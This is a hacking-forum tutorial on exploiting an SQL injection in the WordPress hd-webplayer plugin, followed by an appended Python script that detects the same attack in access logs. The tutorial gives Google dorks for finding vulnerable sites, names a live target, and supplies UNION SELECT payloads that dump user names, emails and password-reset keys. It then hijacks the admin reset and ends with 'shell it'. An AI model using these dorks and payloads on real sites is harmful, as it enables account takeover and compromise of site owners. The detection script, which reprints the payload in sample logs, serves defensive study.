TOPIC: WordPress vulnerabilities: SQLi in plugin





So let's begin.
I will use this 0day here by JoinSeventh.

First of all we need to find a vulnerable page.
We enter this in Google:

Code:
# Dork 1 (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

# Dork 2 (playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

# Dork 3 (General):
inurl:"/wp-content/plugins/hd-webplayer/"


When you have found your site, you need to find the admin email and username.
I will be using this site for example:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3


[Image: regiont.png]

When I add ' the text disappears, so it is vulnerable.

[Image: regionzn.png]

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--


Now we have 2 users.

[Image: regionjhg.png]

We pick one and copy his email.
Go to the login page of the site.
It is usually here:

Code:
http://www.site.com/wp-login.php


And press "Lost your password?"

[Image: regionz.png]

Now you enter either the username or the email.
We can enter both, so it doesn't matter.
I entered the email.

[Image: regionby.png]
[Image: regionng.png]

Now when you get:

"Check your e-mail for the confirmation link."

It means that the reset key was successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

 

Code:
http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--


[Image: regiongn.png]

Voila!
Now we just need to reset it.

Go to:

Code:
wp-login.php?action=rp&key=resetkey&login=username


NOTE: Replace key= & login=

So my link will be:

[Image: regionzi.png]

Enter new password:

[Image: thefreenudecelebritysit.png]
[Image: regiongv.png]

Log in with the new password and shell it.
http://www.hackforums.net/showthread.php?tid=2405188
That's it guys.



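The chain described in the post above (a non-integer `videoid`/`id` reaching SQL, a dump of `user_activation_key` from `wp_users`, then a `wp-login.php?action=rp` request with the stolen key) leaves a distinctive trail in web-server access logs. The following is an added defender-side example, not code from the post or from the hd-webplayer plugin. It parses Apache-style combined log lines, flags requests to the plugin's scripts whose `id`/`videoid` parameter is not a plain integer, and correlates a reset-key extraction attempt with a later reset-key use from the same client IP. The `safe_video_id` helper shows the input check the plugin lacked (accept only an integer, never concatenate the raw value into SQL). The log lines, IPs, timestamps and the `admin` login are constructed for illustration; the plugin path and parameter names are taken from the post; the log format and 30-minute correlation window are assumptions.

```python
"""Detection helpers for the hd-webplayer SQLi -> password-reset chain.

Added example; not code from the original post or from the plugin.
Log lines, IPs, timestamps and logins below are constructed.
"""
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

PLUGIN_PREFIX = "/wp-content/plugins/hd-webplayer/"   # path from the post
ID_PARAMS = ("id", "videoid")                         # parameters the scripts read
SQL_MARKERS = re.compile(r"\b(union|select|from|wp_users|user_activation_key)\b", re.I)

# Constructed Apache combined-style lines (the reset key is redacted on purpose).
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2013:12:00:01 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3 HTTP/1.1" 200 812
203.0.113.5 - - [10/Mar/2013:12:00:07 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=3' HTTP/1.1" 200 0
203.0.113.5 - - [10/Mar/2013:12:01:30 +0000] "GET /wp-content/plugins/hd-webplayer/playlist.php?videoid=-3%20UNION%20SELECT%201,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11%20FROM%20wp_users-- HTTP/1.1" 200 455
203.0.113.5 - - [10/Mar/2013:12:02:10 +0000] "GET /wp-login.php?action=lostpassword HTTP/1.1" 200 3012
203.0.113.5 - - [10/Mar/2013:12:03:40 +0000] "GET /wp-login.php?action=rp&key=REDACTED&login=admin HTTP/1.1" 200 3100
198.51.100.9 - - [10/Mar/2013:12:04:00 +0000] "GET /wp-content/plugins/hd-webplayer/config.php?id=12 HTTP/1.1" 200 640
"""

# Assumed log layout: client IP, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["status"] = int(rec["status"])
    return rec


def safe_video_id(raw):
    """The check the plugin lacked: accept only a plain integer.

    Returns the int, or None to reject. A rejected value must never be
    concatenated into a query (a parameterised query is still the real fix).
    """
    return int(raw) if re.fullmatch(r"-?\d+", raw) else None


def classify(rec):
    """Return a list of finding labels for one parsed request."""
    findings = []
    url = urlsplit(rec["target"])
    query = parse_qs(url.query, keep_blank_values=True)   # also percent-decodes values
    if url.path.startswith(PLUGIN_PREFIX):
        for name in ID_PARAMS:
            for value in query.get(name, []):
                if safe_video_id(value) is None:
                    findings.append("non-integer %s in hd-webplayer request" % name)
                if SQL_MARKERS.search(value):
                    findings.append("sql keywords in %s" % name)
                if re.search(r"user_activation_key", value, re.I):
                    findings.append("reset-key extraction attempt")
    if url.path.endswith("/wp-login.php") and query.get("action") == ["rp"]:
        findings.append("password reset key used")
    return findings


def detect_takeover_chains(lines, window=timedelta(minutes=30)):
    """Correlate, per client IP, a user_activation_key dump attempt with a
    later reset-key use inside `window`. Returns {ip: [login names]}."""
    key_dumps = {}   # ip -> timestamp of the most recent extraction attempt
    chains = {}
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        findings = classify(rec)
        if "reset-key extraction attempt" in findings:
            key_dumps[rec["ip"]] = rec["ts"]
        if "password reset key used" in findings:
            t0 = key_dumps.get(rec["ip"])
            if t0 is not None and rec["ts"] - t0 <= window:
                login = parse_qs(urlsplit(rec["target"]).query).get("login", ["?"])[0]
                chains.setdefault(rec["ip"], []).append(login)
    return chains


if __name__ == "__main__":
    for line in SAMPLE_LOG.splitlines():
        rec = parse_line(line)
        print(rec["ip"], rec["ts"].time(), classify(rec))
    print("takeover chains:", detect_takeover_chains(SAMPLE_LOG.splitlines()))
```

On the constructed sample the single-quote probe and the UNION payload are both flagged as non-integer `videoid`, the UNION line additionally as SQL keywords and a reset-key extraction attempt, and the later `action=rp` request from the same IP is reported as a completed chain for login `admin`; the plain `id=12` request from another client produces no findings. A user_activation_key value in `wp_users` that was never requested through the real "Lost your password?" flow, or a reset from an IP that never visited `action=lostpassword`, is the complementary signal to look for on the database side.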